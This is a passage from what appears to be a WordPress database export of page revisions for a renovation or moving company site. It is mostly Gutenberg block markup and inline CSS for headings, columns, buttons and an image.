.skt-blocks-block-advanced-heading.block-a76f9b72-1972-4fc1-9508-94e879ce8fe8 {\n text-align: left; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-a76f9b72-1972-4fc1-9508-94e879ce8fe8 {\n text-align: left; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-a76f9b72-1972-4fc1-9508-94e879ce8fe8 {\n text-align: center; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-a76f9b72-1972-4fc1-9508-94e879ce8fe8\"><p class=\"responsive-heading-desc-text\" style=\"font-family:Poppins;font-weight:700;line-height:1.1;letter-spacing:1px;color:#253242\">Our Safe Moving<br>Procedures</p></div>\n<!-- /wp:skt-blocks/advanced-heading --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"bottomPaddingMobile\":30,\"blockId\":\"ee5678bf-92ed-4865-aa79-230e1108a2f5\"} -->\n<style type=\"text/css\"> .block-ee5678bf-92ed-4865-aa79-230e1108a2f5 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-ee5678bf-92ed-4865-aa79-230e1108a2f5 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-ee5678bf-92ed-4865-aa79-230e1108a2f5 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-ee5678bf-92ed-4865-aa79-230e1108a2f5 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-ee5678bf-92ed-4865-aa79-230e1108a2f5 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: 30px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-ee5678bf-92ed-4865-aa79-230e1108a2f5\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/buttons {\"buttonAlignment\":\"right\"} -->\n<div class=\"right tabletAligncenter mobileAligncenter skt-blocks-block-button skt-blocks-buttons__outer-wrap skt-blocks-buttons-stack-none\"><div class=\"skt-blocks-buttons__wrap skt-blocks-buttons-layout-wrap\"><!-- wp:skt-blocks/buttons-child {\"label\":\"View All\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/blog-full-width/\",\"counterId\":\"a5cb6a55-72ca-447b-9d80-e0be7d2f2b89\",\"hPadding\":25,\"vMargin\":20,\"hMargin\":0,\"borderRadius\":0,\"borderStyle\":\"none\",\"borderColor\":\"\",\"borderHColor\":\"\",\"color\":\"#ffffff\",\"background\":\"#fe8333\",\"hColor\":\"\",\"buttonFontFamily\":\"Poppins\",\"buttonFontSize\":15,\"hbackground\":\"#0d2e63\",\"buttonFontWeight\":\"600\",\"backgroundType\":\"color\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-a5cb6a55-72ca-447b-9d80-e0be7d2f2b89 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 20px !important; margin-bottom: 20px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-a5cb6a55-72ca-447b-9d80-e0be7d2f2b89 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px; margin-bottom: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-a5cb6a55-72ca-447b-9d80-e0be7d2f2b89 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px; margin-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-a5cb6a55-72ca-447b-9d80-e0be7d2f2b89 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 0px !important; margin-right: 0px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-a5cb6a55-72ca-447b-9d80-e0be7d2f2b89 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 10px; margin-right: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-a5cb6a55-72ca-447b-9d80-e0be7d2f2b89 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 5px; margin-right: 5px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-a5cb6a55-72ca-447b-9d80-e0be7d2f2b89 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-a5cb6a55-72ca-447b-9d80-e0be7d2f2b89 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-a5cb6a55-72ca-447b-9d80-e0be7d2f2b89 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-a5cb6a55-72ca-447b-9d80-e0be7d2f2b89 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 25px; padding-right: 25px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-a5cb6a55-72ca-447b-9d80-e0be7d2f2b89 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 14px; padding-right: 14px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-a5cb6a55-72ca-447b-9d80-e0be7d2f2b89 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 14px; padding-right: 14px; }\n}\n</style><style type=\"text/css\"> .skt-blocks-a5cb6a55-72ca-447b-9d80-e0be7d2f2b89.skt-blocks-button__wrapper .skt-blocks-button__link_child {\n color: #ffffff; }\n .skt-blocks-a5cb6a55-72ca-447b-9d80-e0be7d2f2b89 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper:hover .skt-blocks-button__link_child {\n color: ; }\n .skt-blocks-a5cb6a55-72ca-447b-9d80-e0be7d2f2b89 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper{\n border-color: ; border-radius: 0px; border-style: none; border-width: 1px; box-shadow: 0px 0px undefined ; }\n .skt-blocks-a5cb6a55-72ca-447b-9d80-e0be7d2f2b89 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a{\n font-size: 15px; font-family: Poppins; font-weight: 600; line-height: undefined; opacity: 1; }\n .skt-blocks-a5cb6a55-72ca-447b-9d80-e0be7d2f2b89 .skt-blocks-button__wrapper:hover {\n border-color: ; }\n</style><style type=\"text/css\"> .skt-blocks-a5cb6a55-72ca-447b-9d80-e0be7d2f2b89 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n background-color: #fe8333; }\n .skt-blocks-a5cb6a55-72ca-447b-9d80-e0be7d2f2b89 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper:hover {\n background-color: #0d2e63; }\n</style><style type=\"text/css\"> .skt-blocks-a5cb6a55-72ca-447b-9d80-e0be7d2f2b89 .skt-blocks-button__wrapper .skt-blocks-button__icon svg{\n fill: #3a3a3a; width: 16px; height: 16px; }\n .skt-blocks-a5cb6a55-72ca-447b-9d80-e0be7d2f2b89 .skt-blocks-button__wrapper:hover .skt-blocks-button__icon svg{\n fill: undefined; }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-a5cb6a55-72ca-447b-9d80-e0be7d2f2b89 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: 15px !important; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-a5cb6a55-72ca-447b-9d80-e0be7d2f2b89 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-a5cb6a55-72ca-447b-9d80-e0be7d2f2b89 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: undefinedpx; }\n}\n</style><div class=\"skt-blocks-undefined skt-blocks-block-button skt-blocks-buttons__outer-wrap\"><div class=\"skt-blocks-a5cb6a55-72ca-447b-9d80-e0be7d2f2b89 skt-blocks-button__wrapper skt-blocks-button__effect-undefined\"><div class=\"skt-blocks-buttons-repeater skt-blocks-button__wrapper\"><a class=\"skt-blocks-button__link_child\" href=\"https://sktperfectdemo.com/themepack/gbrenovate/blog-full-width/\" rel=\"noopener noreferrer\" target=\"_blank\">View All</a></div></div></div>\n<!-- /wp:skt-blocks/buttons-child --></div></div>\n<!-- /wp:skt-blocks/buttons --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns -->\n\n<!-- wp:spacer {\"height\":\"50px\"} -->\n<div style=\"height:50px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:skt-blocks/skt-blocks-post-grid {\"postsToShow\":2,\"displayPostExcerpt\":false,\"displayPostAuthor\":false,\"postTitleTag\":\"h5\",\"readMoreText\":\"Read More\",\"bgColor\":\"#ffffff\",\"imageBorderRadius\":0,\"metaColor\":\"#6a6a6a\",\"readMoreLinkColor\":\"#fc8134\",\"titleColor\":\"#282828\",\"titleHoverColor\":\"#0d2e63\",\"contentPadding\":0,\"continueFontSize\":16,\"continueFontWeight\":\"600\",\"titleFontSize\":24,\"titleLineHeight\":1.2,\"titleFontWeight\":\"400\",\"metaFontSize\":16,\"metaFontWeight\":\"400\",\"metaTextTransform\":\"capitalize\",\"titleFontFamily\":\"Poppins\",\"metaFontFamily\":\"Poppins\",\"rowGap\":0,\"postGridBlockId\":\"eca83834\"} /--></div></section></div>\n<!-- /wp:skt-blocks/section -->','Home','','inherit','closed','closed','','336-revision-v1','','','2022-08-24 18:08:56','2022-08-24 18:08:56','',336,'https://cteisys.com/?p=481',0,'revision','',0),(483,1,'2022-08-24 23:15:52','2022-08-24 23:15:52','<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"f90851d4-c514-47ae-86e7-eec3151567da\",\"topPadding\":80,\"topPaddingMobile\":40,\"topPaddingTablet\":40,\"bottomPadding\":80,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":40,\"opacity\":100,\"backgroundColor\":\"#ffffff\",\"backgroundType\":\"color\",\"className\":\"gb-renovation-section-1\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-section-1 skt-blocks-block-section-outer-wrap block-f90851d4-c514-47ae-86e7-eec3151567da background-type-color alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-f90851d4-c514-47ae-86e7-eec3151567da .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-f90851d4-c514-47ae-86e7-eec3151567da .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-f90851d4-c514-47ae-86e7-eec3151567da .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 80px; padding-bottom: 80px; padding-left: 10px; padding-right: 10px; }\n}\n .block-f90851d4-c514-47ae-86e7-eec3151567da.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 1),rgba(255, 255, 255, 1)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-f90851d4-c514-47ae-86e7-eec3151567da.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 1); }\n .block-f90851d4-c514-47ae-86e7-eec3151567da.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-f90851d4-c514-47ae-86e7-eec3151567da.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-f90851d4-c514-47ae-86e7-eec3151567da.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 1); }\n</style><style type=\"text/css\"> .block-f90851d4-c514-47ae-86e7-eec3151567da .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-f90851d4-c514-47ae-86e7-eec3151567da .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-f90851d4-c514-47ae-86e7-eec3151567da.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-f90851d4-c514-47ae-86e7-eec3151567da .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-f90851d4-c514-47ae-86e7-eec3151567da.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-f90851d4-c514-47ae-86e7-eec3151567da .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-f90851d4-c514-47ae-86e7-eec3151567da.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;background-color:rgba(255, 255, 255, 1);box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"ec9b4f49-717b-424d-8c1f-2e6b2881e683\"} -->\n<style type=\"text/css\"> .block-ec9b4f49-717b-424d-8c1f-2e6b2881e683 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-ec9b4f49-717b-424d-8c1f-2e6b2881e683 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-ec9b4f49-717b-424d-8c1f-2e6b2881e683 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-ec9b4f49-717b-424d-8c1f-2e6b2881e683 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-ec9b4f49-717b-424d-8c1f-2e6b2881e683 .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-ec9b4f49-717b-424d-8c1f-2e6b2881e683 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-ec9b4f49-717b-424d-8c1f-2e6b2881e683 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-ec9b4f49-717b-424d-8c1f-2e6b2881e683 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"blockId\":\"3b8ab6fb-01d5-431b-91dd-de5fc7c626d6\"} -->\n<style type=\"text/css\"> .block-3b8ab6fb-01d5-431b-91dd-de5fc7c626d6 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-3b8ab6fb-01d5-431b-91dd-de5fc7c626d6 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-3b8ab6fb-01d5-431b-91dd-de5fc7c626d6 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-3b8ab6fb-01d5-431b-91dd-de5fc7c626d6 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-3b8ab6fb-01d5-431b-91dd-de5fc7c626d6 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-3b8ab6fb-01d5-431b-91dd-de5fc7c626d6\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:image {\"id\":386,\"width\":257,\"height\":530,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"className\":\"is-style-default\"} -->\n<figure class=\"wp-block-image size-full is-resized is-style-default\"><img src=\"https://cteisys.com/wp-content/uploads/2022/08/32926267_2062360403778390_9097229843803668480_n.jpg\" alt=\"\" class=\"wp-image-386\" width=\"257\" height=\"530\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:skt-blocks/section {\"blockId\":\"2d0e433e-b09c-451a-a1f6-274a9de78652\",\"opacity\":100,\"backgroundColor\":\"#fe8333\",\"backgroundType\":\"color\",\"className\":\"gb-renovation-quality-box\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-quality-box skt-blocks-block-section-outer-wrap block-2d0e433e-b09c-451a-a1f6-274a9de78652 background-type-color alignundefined\" style=\"z-index:1;max-width:900px;margin-left:auto;margin-right:auto\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-2d0e433e-b09c-451a-a1f6-274a9de78652 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-2d0e433e-b09c-451a-a1f6-274a9de78652 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-2d0e433e-b09c-451a-a1f6-274a9de78652 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n .block-2d0e433e-b09c-451a-a1f6-274a9de78652.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 1),rgba(255, 255, 255, 1)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-2d0e433e-b09c-451a-a1f6-274a9de78652.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 1); }\n .block-2d0e433e-b09c-451a-a1f6-274a9de78652.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-2d0e433e-b09c-451a-a1f6-274a9de78652.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-2d0e433e-b09c-451a-a1f6-274a9de78652.background-type-video .skt-blocks-block-section {\n background-color: rgba(254, 131, 51, 1); }\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;background-color:rgba(254, 131, 51, 1);box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"88555fca-6dda-4435-9d42-f653c9586df1\",\"showSubHeading\":false,\"showSeparator\":false,\"headSpacing\":0,\"headingTitleFontFamily\":\"Poppins\",\"headingTitleFontSize\":32,\"headingTitleFontSizeMobile\":30,\"headingTitleFontSizeTablet\":32,\"headingTitleFontWeight\":\"700\",\"headingTitleLineHeight\":1.3,\"headingTitleColor\":\"#ffffff\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-88555fca-6dda-4435-9d42-f653c9586df1 .responsive-heading-title-text {\n font-size: 32px !important; margin-bottom: 0px !important; }\n\n.skt-blocks-block-advanced-heading.block-88555fca-6dda-4435-9d42-f653c9586df1 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-88555fca-6dda-4435-9d42-f653c9586df1 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-88555fca-6dda-4435-9d42-f653c9586df1 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-88555fca-6dda-4435-9d42-f653c9586df1 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-88555fca-6dda-4435-9d42-f653c9586df1 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-88555fca-6dda-4435-9d42-f653c9586df1 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-88555fca-6dda-4435-9d42-f653c9586df1 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-88555fca-6dda-4435-9d42-f653c9586df1 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-88555fca-6dda-4435-9d42-f653c9586df1 .responsive-heading-title-text {\n font-size: 32px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-88555fca-6dda-4435-9d42-f653c9586df1 .responsive-heading-title-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-88555fca-6dda-4435-9d42-f653c9586df1 .responsive-heading-desc-text {\n font-size: undefinedpx !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-88555fca-6dda-4435-9d42-f653c9586df1 {\n text-align: center; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-88555fca-6dda-4435-9d42-f653c9586df1 {\n text-align: center; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-88555fca-6dda-4435-9d42-f653c9586df1 {\n text-align: center; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-88555fca-6dda-4435-9d42-f653c9586df1\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Poppins;font-weight:700;line-height:1.3;letter-spacing:0;color:#ffffff\">Quality<br>Works</h2></div>\n<!-- /wp:skt-blocks/advanced-heading --></div></section></div>\n<!-- /wp:skt-blocks/section --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"topPadding\":15,\"leftPadding\":50,\"topPaddingTablet\":15,\"leftPaddingTablet\":35,\"topPaddingMobile\":40,\"leftPaddingMobile\":0,\"blockId\":\"cd3cb9ff-14b9-4cad-bfef-2367d403384a\"} -->\n<style type=\"text/css\"> .block-cd3cb9ff-14b9-4cad-bfef-2367d403384a .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-cd3cb9ff-14b9-4cad-bfef-2367d403384a .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-cd3cb9ff-14b9-4cad-bfef-2367d403384a .skt-blocks-block-column{\n padding-top: 15px; padding-bottom: undefinedpx; padding-left: 50px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-cd3cb9ff-14b9-4cad-bfef-2367d403384a .skt-blocks-block-column{\n padding-top: 15px; padding-bottom: undefinedpx; padding-left: 35px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-cd3cb9ff-14b9-4cad-bfef-2367d403384a .skt-blocks-block-column{\n padding-top: 40px; padding-bottom: undefinedpx; padding-left: 0px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-cd3cb9ff-14b9-4cad-bfef-2367d403384a\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"0f159bdd-7f31-4f5d-8116-79161efa80a9\",\"showSeparator\":false,\"subheadSpacing\":5,\"separatorSpacing\":0,\"headingTitleFontFamily\":\"Poppins\",\"headingTitleFontSize\":19,\"headingTitleFontSizeMobile\":19,\"headingTitleFontSizeTablet\":19,\"headingTitleColor\":\"#fe8333\",\"subHeadingTitleFontFamily\":\"Poppins\",\"subHeadingTitleFontSize\":42,\"subHeadingTitleFontSizeMobile\":30,\"subHeadingTitleFontSizeTablet\":30,\"subHeadingTitleFontWeight\":\"700\",\"subHeadingTitleLineHeight\":1.1,\"subHeadingTitleLetterSpacing\":1,\"subHeadingTitleColor\":\"#253242\",\"headingAlignment\":\"left\",\"headingAlignmentTablet\":\"left\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-0f159bdd-7f31-4f5d-8116-79161efa80a9 .responsive-heading-title-text {\n font-size: 19px !important; margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-0f159bdd-7f31-4f5d-8116-79161efa80a9 .responsive-heading-seperator {\n margin-bottom: 0px !important; }\n\n.skt-blocks-block-advanced-heading.block-0f159bdd-7f31-4f5d-8116-79161efa80a9 .responsive-heading-desc-text {\n margin-bottom: 5px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-0f159bdd-7f31-4f5d-8116-79161efa80a9 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-0f159bdd-7f31-4f5d-8116-79161efa80a9 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-0f159bdd-7f31-4f5d-8116-79161efa80a9 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-0f159bdd-7f31-4f5d-8116-79161efa80a9 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-0f159bdd-7f31-4f5d-8116-79161efa80a9 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-0f159bdd-7f31-4f5d-8116-79161efa80a9 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 